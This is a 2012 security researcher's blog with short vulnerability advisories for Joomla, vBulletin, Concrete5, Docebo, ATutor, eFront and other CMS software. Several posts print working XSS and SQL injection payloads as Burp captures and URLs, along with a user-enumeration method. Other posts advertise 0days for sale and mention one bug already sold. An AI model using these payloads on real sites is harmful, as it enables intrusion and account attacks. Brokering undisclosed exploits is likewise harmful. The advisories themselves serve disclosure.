Monday, 30 April 2012

[EN] Joomla 2.5.4 "SQL Info leak"

Ok,

so maybe You have 'display_errors=On' (or sth... still) on Your site...

So try this at Your localhost:

It's important to mention that if You ('attacker') get this error,
You (he is) are able to view 'randomed' Joomla-prefixes for some names.
Look at screen in JOIN query.

Cheers! o/

[EN] vBulletin 4.1.12 - 'SQL Info leak' - up9.05

Sold. No more public.

Cheers o/

[EN] vBulletin 4.1.12 Cross-site scripting

[ TITLE ....... ][ vBulletin 4.1.12 Reflected XSS (try csrf*) for registered users
[ DATE ........ ][ 24.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.vbulletin.com
[ VERSION ..... ][ 4.1.12
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
Reflected cross-site scripting.

(* ..., because I think this could be extended to attack
with 'non-visible button'. ;))

[--------------------------------------------[
[ 3. Where is bug :)

When You are logged-in as a normal user, You can add post to forum.
You can add title (parameter "subject") of Your post only with 85 characters.
And that's the trick, because error displayed to user (if 'subject' is > 85 chars)
can contain XSS code.

Try to add Ax85+"><xss><

Screen from attack You can see below:






[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.vbulletin.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Questions? Mail me.
[
[ Cheers o/

[EN] Buy 0days

I have few new 0days for Your webapps ;)

Latest Joomla, Wordpress, Drupal, TYPO3, vBulletin... it will be good start to talk.

If You want anything - mail me.

o/

Saturday, 28 April 2012

[EN] vBulletin 4.1.12 information disclosure - (01.05 UP)

Sure :)
...I don't have a 'free May... :P

So here one example:

Right now I can not tell more, but... See You soon! ;)

* Updated - 01.05 *  

Hi again,

To the point: if user can add content (like ‘new page’ – what is not in default installation;))
he can manipulate a little with parameters to get as an answer some 'information disclosure' bug.

And here─ůs the example answer:


Check this line for more "information" ;)

Enojy! o/

Friday, 27 April 2012

[EN] Work to win 0day ;)


Yeah, yeah...;]

"Work"... like this:
currently I have few "notes" about "possible" rce bugs in few top10 webapps.

If You're interested to check it out, You know where You can find me... ;)

Regards
o/

[EN] Joomla 2.5.4 Information disclosure

Hi! :) Busy week and busy month... ;)

I have one more information for You today:
in latest Joomla I found information disclosure bug.

Why it's 'information disclosure' (for now)? Because I'm still developing working exploit for "this
parameter". I think it could be extended to other 'validation attacks'... so :D

For now, it's only 'information' (for You). ;)

I will update this information later (maybe next week), but now I have too much to do.

Anyway, if You need "no-public help", as always - mail me;)

Cheers! o/

EDIT: This is one bug I want to taka look more because it's available for not-logged-in users.
So "my favourite"! ;)

[EN] Wanna 0day for Your webapp? ;)

Ok. It's simple:
mail me with request for webapp (name and version) and I will tell You
what I have for it. Simple? ;)

Details we will discuss privately.

Cheers! ;)

Thursday, 26 April 2012

[EN] Update for April! - finally (part 3)


As You can see below, I paste it few news. Check it out! ;)


Comments / questions are welcome!

Cheers o/

[EN] Concrete5.5.2.1 CMS is vulnerable to XSS (for logged-in users)


[ TITLE ....... ][ Concrete5.5.2.1 CMS is vulnerable to XSS (for logged-in users)
[ DATE ........ ][ 23.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://concrete5.org
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
This is cross-site scripting.

[--------------------------------------------[
[ 3. Where is bug :)
Below I present You some traffic from Burp Proxy:

...[cut from Burp]...
GET /concrete5.5.2.1/index.php/tools/required/edit_collection_popup.php?
approveImmediately=%22%3e%3cimg%20src%3dx%20onerror%3dalert(123123123)%3e&cID=102&ctask=edit_metadata HTTP/1.1
Host: localhost
(...)
X-Requested-With: XMLHttpRequest
Cookie: CONCRETE5=...

...[end of cut]...

So vulnerable parameter is "approveImmediately", check it out:

...[answer (response) from Burp]...
(...)
<form method="post" name="permissionForm" id="ccmMetadataForm" action="http://localhost/concrete5.5.2.1/index.php?cID=102&ccm_token=...:...">
<input type="hidden" name="approveImmediately" value=""><img src=x onerror=alert(123123123)>" />
(...)

...[end of response]...


[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] Concrete 5.5.2.1 Cross Site Scripting


[ TITLE ....... ][ Concrete 5.5.2.1 Cross Site Scripting
[ DATE ........ ][ 23.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.concrete5.org/
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
This is cross site scripting vulnerability.

[--------------------------------------------[
[ 3. Where is bug :)
...raw cut from Burp...
POST /concrete5.5.2.1/index.php?cID=121&bID=38&arHandle=Main&ccm_token=...:...&btask=''%3b!--"%3cbody%20onload%3dalert(12312312323)%3e%3d%26{()}&method=submit_form HTTP/1.1
(...)
...end cut...

And 'cut' from answer with our 'payload':
"
(...)
<script type="text/javascript" src="/www/concrete5.5.2.1/concrete/js/tiny_mce/tiny_mce.js?v=aa5e8ba94816af5cea082fa1b3a32500"></script>
<script type="text/javascript" src="/www/concrete5.5.2.1/index.php/tools/required/page_controls_menu_js?cID=121&amp;cvID=&amp;btask='';!--"<body onload=alert(12312312323)>=&{()}&amp;ts=1335145603"></script>
</body>
(...)
"

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.concrete5.org/
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] Concrete 5.5.2.1 CMS - SQL Injection


[ TITLE ....... ][ Concrete 5.5.2.1 CMS - SQL Injection
[ DATE ........ ][ 22.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.concrete5.org/
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
SQL Injection.

[--------------------------------------------[
[ 3. Where is bug :)
Vulnerable parameter is fID. For example (from mysqls logs):

    60832 Query    insert into DownloadStatistics (fID, fvID, uID, rcID) values (NULL, 0, 1, 0)
        FROM Files LEFT JOIN FileVersions on Files.fID = FileVersions.fID and FileVersions.fvIsApproved = 1
        WHERE Files.fID = '1 waitfor delay \'0:0:10\'--'
        FROM Files LEFT JOIN FileVersions on Files.fID = FileVersio

Ok, so now we know that sql injection occurs in parameter for 'statistic' (if file=downloaded >+1@stats).

Enjoy but I saw that this parameter is available only for admin, so... ;> .

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.concrete5.org/
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] Concrete5.5.2.1 CMS information disclosure bug

[ TITLE ....... ][ Concrete5.5.2.1 CMS information disclosure bug
[ DATE ........ ][ 22.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.concrete5.org/
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
Information disclosure bug.

[--------------------------------------------[
[ 3. Where is bug :)
(...raw cut from Burp...)

GET /concrete5.5.2.1/index.php/search/?search_paths%5B%5D=&query=aaaaaaaaaaaa&submit=Search HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0
(...)
Referer: http://concrete-host/concrete5.5.2.1/index.php/search/
Cookie: CONCRETE5=%2f%2a%2a%2fAND%2f%2a%2a%2f1%3d0%2f%2a%2a%2fUNION%2f%2a%2a%2fALL%2f%2a%2a%2fSELECT%2f%2a%2a%2f@@version,%2f%2a%2a%2f2--; (...)=(...); PHPSESSID=phpsessid
Connection: close

(...end cut...)

Hm :)

So answer is (for vulnerable php.ini of course):
"


<br />
<b>Warning</b>:  session_start() [<a href='function.session-start'>function.session-start</a>]:
The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and
'-,' in <b>/www/concrete5.5.2.1/concrete/startup/session.php</b> on line <b>32</b><br />
<!DOCTYPE html>
<html lang="en">
(...)
"

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.concrete5.org/
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] HikaShop information disclosure bug


[ TITLE ....... ][ HikaShop information disclosure bug
[ DATE ........ ][ 18.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][
[ VERSION ..... ][ latest
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
Information disclosure bug.

[--------------------------------------------[
[ 3. Where is bug :)
Try this:

http://joomla2.5.4/index.php/component/hikashop/checkout/state/tmpl-component?field_type=address&field_namekey=%22%3EKUBA;]%3Cbr%3E%3Cbr%3E%3Cbr%3E

Vulnerable parameters seems to be:
order_id
product_id
checkout
field_namekey


[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.concrete5.org/
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] e107 CMS - reflected xss in registration page


[ TITLE ....... ][ e107 CMS - reflected xss in registration page
[ DATE ........ ][ 16.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://e107.org
[ VERSION ..... ][ latest;)
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
Reflected XSS.

[--------------------------------------------[
[ 3. Where is bug :)
At registration page. Screens of attacks available at my blog.

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.e107.org
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] Docebo LMS (docebo_3605.zip) "SQL-information-disclosure" bug ;)


[ TITLE ....... ][ Docebo LMS (docebo_3605.zip)
[ DATE ........ ][ 15.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.docebo.com
[ VERSION ..... ][ docebo_3605.zip
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?

This is kind of information disclosure bug.

Because of wrong validation, user can access 'error message' from Docebo.
http://docebo/doceboLms/index.php?modname=coursecatalogue&op=courselist&id_course=%29%27%3e%27%3e%3cBODY%20onload!#$%%26%28%29%2a~%2b-_%2e,%3a%3b%3f@[%2f|%5c]^%60%3dalert%28%22XSS%22%29%3e&re=ok_subs

(This is 'standard xss' attack from one of books about it. Anyway,)
for this 'payload', we will see an error:
"You can't access/lms/course/private/1/coursecatalogue/view".

Sure, but when we'll check source of page, there is more:
"

<!-- SELECT count(idOrg) FROM learning_organization LEFT JOIN learning_organization_access ON
( learning_organization.idOrg = learning_organization_access.idOrgAccess ) WHERE (idCourse = '1') 
AND (idResource <> 0) AND (visible = '1') AND ( (learning_organization_access.kind = 'user'   
AND learning_organization_access.value = '1040')      
OR learning_organization_access.idOrgAccess IS NULL)
-->You can't access/lms/course/private/1/coursecatalogue/view"

Tadaaam :)

[--------------------------------------------[
[ 3. Where is bug :)

Information disclosure bug for vulnerable parameter:
id_course.
This parameter is getting value from id parameter from 1 request before.

Check it.

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.docebo.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] Docebo LMS HTML Injection


[ TITLE ....... ][ Docebo LMS HTML Injection
[ DATE ........ ][ 15.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.docebo.com
[ VERSION ..... ][ docebo_3605.zip
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
HTML Injection.

[--------------------------------------------[
[ 3. Where is bug :)

HTTP GET 'attack' should look like this:
http://docebo/doceboLms/index.php?modname=course&op=infocourse&id_module_sel=10+payload

Vulnerable parameter is :
id_module_sel,
ord,
op_listview_idplayitem,
working_area,
(more?)


Anyway, I was able to 'attack' application only in automated way.
Directly accesing parameter id_module_sel with payload (html injection string)
is not working. Setting few attacks (for example 10) could do adding to DB/cache(?)
content (payload) and 'selecting it' with next request(with next payload).

Wierd, but works. Question for now is how to automate this to 'real exploitation
scenarion' ;) For education of course.

Try this:
http://docebo/doceboLms/index.php?modname=course&op=infocourse&id_module_sel=10}%3E%3Ch1%3Etest%3Cbr%3Etest2%3C%2fh1%3E

Screens of attack You will find @ my blog. ;)

And this:
http://docebo/doceboLms/ajax.server.php?plf=lms&mn=calendar&op=set&index=0&id=%3Ch1%3E%3Cimg%20src=x%20onerror=alert%28123%29%3Eaaaaa%3C/h1%3E&_owner=1040&calEventClass=lms&private=on&start_day=15&start_month=4&start_year=2012&start_hour=09&start_min=00&start_sec=00&end_day=15&end_month=4&end_year=2012&end_hour=09&end_min=00&end_sec=00&category=a&title=aaaaaaaaaaaaaa&description=bbbbbbbbbbbbbbb

Vulnerable parameters here are: id and index.

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.docebo.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] ATutor 2.0.3 XSS


[ TITLE ....... ][ ATutor 2.0.3 XSS
[ DATE ........ ][ 14.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://
[ VERSION ..... ][
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?


[--------------------------------------------[
[ 3. Where is bug :)
................
hard copied from burp:
POST /www/NEW/atutor/ATutor/registration.php HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

Referer: http://localhost/www/NEW/atutor/ATutor/registration.php?register=Register

Cookie: ATutorID=ggobghtrr9dlt3d2qrsrjeej86; ea630b8e07331dfe8176df9908b196be=en-GB; PHPSESSID=rcqn6f0825bopcnfuthkb95la1; docebo_installer=qkel6srpbe1r44falthfgbloi7; docebo_session=au1hlm6k0dj1t72lvl88pdqt31; d5ff290df9b8ab6a17548bbbc48d21bc=903fb97e17f9a31fea5f97ee76a591bf

Content-Type: application/x-www-form-urlencoded

Content-Length: 1605

Connection: close



ml="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&password_error="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&form_password_hidden=923956e1de909d796933df77360069ceaa3df747&registration_token=04bfd37055f6b1b81319dbc326165a78af8a2ba0&login="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e%2F**%2For%2F**%2F1%3D%271%27&form_password1="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&form_password2="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&email="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&private_email="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&email2="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&first_name="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&second_name="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&last_name="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&year="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&month="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&day="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&gender="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&address="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&postal="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&city="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&province="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&country="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&phone="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&website="%3e%3cimg%20src%3ddef%20onerror%3dalert(12312312323)%3e&submit=+Save+



.........

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] eFront 3.6.10 CMS user enumeration attack


[ TITLE ....... ][ eFront 3.6.10 CMS user enumeration attack
[ DATE ........ ][ 11.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.efrontlearning.net
[ VERSION ..... ][ 3.6.10
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
This is user enumeration bug. At (3) You'll see how to enumerate all usernames
registered on eFront WWW.

[--------------------------------------------[
[ 3. Where is bug :)

So Check it out:
Vulnerable to this attack is 'Singup' part of eFront.

How to get the names:
Go to http://efront/www/index.php?ctg=signup

There You'll have 'New user account' tab.
Now what is important: to find out if user-A is registered,
just simple write his ('potential' - could be from dictionary.txt, sure ;)) username
and watch the error message in response.

From 'source of view' it looks like this:

---cut from Burp---
POST /www/NEW/efront/www/index.php?ctg=signup HTTP/1.1
Host: localhost
(...)
Referer: http://localhost/www/NEW/efront/www/index.php?ctg=signup
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 188

_qf__signup_register_personal_form=   ..... <-- leave it, no matter
&login=admin ..............<- this is Your input*, see below
&password=allowed ......................... <-- leave it, no matter
&passrepeat=allowed ......................... <-- leave it, no matter
&email=allowed%40allowed.com ................ <-- ...
&firstName=allowed ......................... <--...
&lastName=allowed ......................... <-- ...
&comments=allowed ......................... <-- ...
&submit_register=Register ......................... <-- ...

---cut from Burp---

*input - this ($login) could be nice parameter to build a simple bash/python/php/whatever-script
to enumerate in few minutes all users from CMS.

What else and so what. Usernames can be used to determine 'weak passwords' or
any other specification for 'creating usernames/passwords' (for example:
john01, john02:pass123, etc...)


[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.efrontlearning.net
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] eFront 3.6.10 CMS Information Disclosure bug

[ TITLE ....... ][ eFront 3.6.10 CMS Information Disclosure bug
[ DATE ........ ][ 11.04.2012 (public, after week or sth)
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://
[ VERSION ..... ][ 3.6.10
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
Information disclosure.

[--------------------------------------------[
[ 3. Where is bug :)
Request from Burp:
---
GET /efront/www/index.php?ctg=lesson_info&courses_ID='%20or%201%3d'1'-- HTTP/1.1
Host: localhost
(...)
---

And answer was:
---
(...)
 <div class = "content" style = ";" id = "Error+Details_content" onmousedown = "if ($('firstlist')) {Sortable.destroy('firstlist');}
if ($('secondlist')) {Sortable.destroy('secondlist');}">
     <pre>#0 /home/kuba/www/efront/libraries/course.class.php(125): EfrontCourse->initializeDataFromSource('' or 1='1'--')
#1 /home/kuba/www/efront/www/index.php(749): EfrontCourse->__construct('' or 1='1'--')
#2 {main}</pre>
(...)
---

initializeDataFromSource(;]) ...

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] VirtueMart 2.0.2 information disclosure (2)


[ TITLE ....... ][ VirtueMart 2.0.2 information disclosure (2)
[ DATE ........ ][ 7.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://
[ VERSION ..... ][
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS component, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
Information disclosure bug.

[--------------------------------------------[
[ 3. Where is bug :)

---- REQUEST ----
POST /joomla/index.php/en/dk?virtuemart_product_id=1&virtuemart_category_id=1 HTTP/1.1
Host: localhost
(...)
vote=5&comment=(...Ax101)...+&counter=172&submit_review=Submit+Review
&virtuemart_product_id=11'HERE'a&option=com_virtuemart
&virtuemart_category_id=1&virtuemart_rating_review_id=0&task=review
-----------------

You will see:
---- RESPONSE ----
<span class="vote"><br />
<b>Notice</b>:  Undefined index:  in <b>/home/kuba/www/joomla/components/com_virtuemart/views/productdetails/tmpl/default_reviews.php</b> on line <b>79</b><br />
</span>
-----------------

[--------------------------------------------[
[ 4. More...

- http://joomla.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] nBill Lite - Joomla component HTML Injection / XSS


[ TITLE ....... ][ nBill Lite - Joomla component HTML Injection / XSS
[ DATE ........ ][ 07.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://
[ VERSION ..... ][
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice component for Joomla, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
HTML Injection.

[--------------------------------------------[
[ 3. Where is bug :)
http://joomla/administrator/index.php?option=com_nbill&action=income&task=generated-view&message=[url%3d%27%3E%3Ch1%3Etestuj%3Cbr%3Etestuj2%3C%2fh1%3E]test%3Cbr%3E123[%2furl]

*Tested from admin only!*
[--------------------------------------------[
[ 4. More...

- http://www.joomla.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ All questions about new projects @ mail now :)
]
[ Best regards
[

[EN] jNews (jnewscore7.5.1) information disclosure


[ TITLE ....... ][ jNews (jnewscore7.5.1) information disclosure
[ DATE ........ ][ 07.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://joomla.org
[ VERSION ..... ][ 7.5.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice component to Joomla CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
Information disclosure. Normal user can add 'wrong input' to forms, and thats
how he find out what is Your Joomla* location.

[--------------------------------------------[
[ 3. Where is bug :)
Its just an example, there are more info-disclo bugs in this component. Anyway:

Go to: http://joomla/index.php/en/component/jnews/ to 'Search' something You want.
At 'search' form type '.

Thats all. For vulnerable php.ini You should see something like:
"Warning: Invalid argument supplied for foreach() in
/home/kuba/www/joomla/administrator/components/com_jnews/classes/class.mailing.php on line 70

Warning: array_merge() [function.array-merge]: Argument #1 is not an array in
/home/kuba/www/joomla/administrator/components/com_jnews/classes/frontend.php on line 1667"

Vulnerable parameter is 'emailsearch'.

[--------------------------------------------[
[ 4. More...

- http://joobi.co
- http://www.joomla.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

[EN] Joomla 2.5.3 information disclosure (tested for admin)


[ TITLE ....... ][ Joomla 2.5.3 information disclosure (tested for admin)
[ DATE ........ ][ 01.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://joomla.org
[ VERSION ..... ][ 2.5.3
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
This is information disclosure bug for admin logged-in.

[--------------------------------------------[
[ 3. Where is bug :)
http://your.joomla/administrator/index.php?option=com_modules&view=positions&layout=modal&tmpl=component&function=jSelectPosition_jform_position&client_id=8%27];][][]%3E???%3E./8

Vulnerable parameter is client_id but "output" with information (disclosure bug) is available only
in HTML source (so right-click, and view source for 'invalid' string to get information where
Joomla is installed on remote server).

By the way: You can set this parameter to non-existent ID (for example 11111111111).
You should get the same response (in source, search for 'invalid').

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.joomla.org
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ All questions about new projects @ mail now :)
]
[ Best regards
[

[EN] Hire Pentester $$

What I'm doing:

It is mostly "black box" testing for companies, e-shops, or some intranet web-stuff, etc. Just ask ;)
This is something I have been doing for several years from now.
We can cooperate remotely ("contracts") or permament. Again: just ask.

How to start:

Send me an e-mail with question(s).
We will pick a time frame for me to start the tests.
After my job, You will get detailed report (vulnerabilities + 'how to remove them')

The Cost:

For You, $200 USD for the test and report (1 WWW).
If you want me to implement the security changes, charge will change. ;)

For those who want to do "server monitoring" for some periods of time
we can discuss payment more specific to your requirements.

If You have any questions, feel free to ask.
My resume is available for request.

Of course, Customers must sign a contract legally. :)


More here:
hauntit.blog@gmail.com

Tuesday, 24 April 2012

[EN] Concrete5 5.2.1 CMS exploits

Yesterday I found few vulnerabilities in latest version of Concrete5 CMS.
I will  publish here more information soon.

Vulnerabilities are:
- sql injection;
- cross-site scripting;
- information disclosure;

For last two of them registered user is able to attack.
For sql injection (for now ;) ) only admin can trigger this issue (anyway it could be available via XSS).

If You need more information before I public it, let me know.


Monday, 23 April 2012

[EN] Quick news

Hi,

today only one "quick news" ;)

Those information will be here as soon as possible, but for "Your information"
(and for "maybe this version is 'version of Your CMS' and You need quick-patch";))
here are listed few vulnerabilities I found this month.
If You need it fast- let me know, as always, via e-mail;)

So:
For (now ;)) 04.2012:
01.04 -Joomla 2.5.3 Information disclosure
04.04 -JooDatabase SQL Injection
06.04 -VirtueMart 2.0.2 Information disclosure
07.04 -jNews - Information disclosure
07.04 -Joomla 2.5.4 - Multiple...
07.04 -nBill Lite - HTML Injection / XSS
07.04 -VirtueMart 2.0.2 Information disclosure
11.04 -eFront CMS 3.6.10 Information disclosure
11.04 - eFront CMS 4.6.10 - User enumeration
14.04 -ATutor 2.0.4 XSS
15.04 -Docebo LMS 3605 - HTML Injection
15.04 - Docebo LMS 3605 - SQL Injection 
16.04 -e107 - reflected XSS
18.04 - HikaShop - Information disclosure


...to be continued... ;)


For 03.2012:
29.03 - gpEasy 2.3.3 XSS
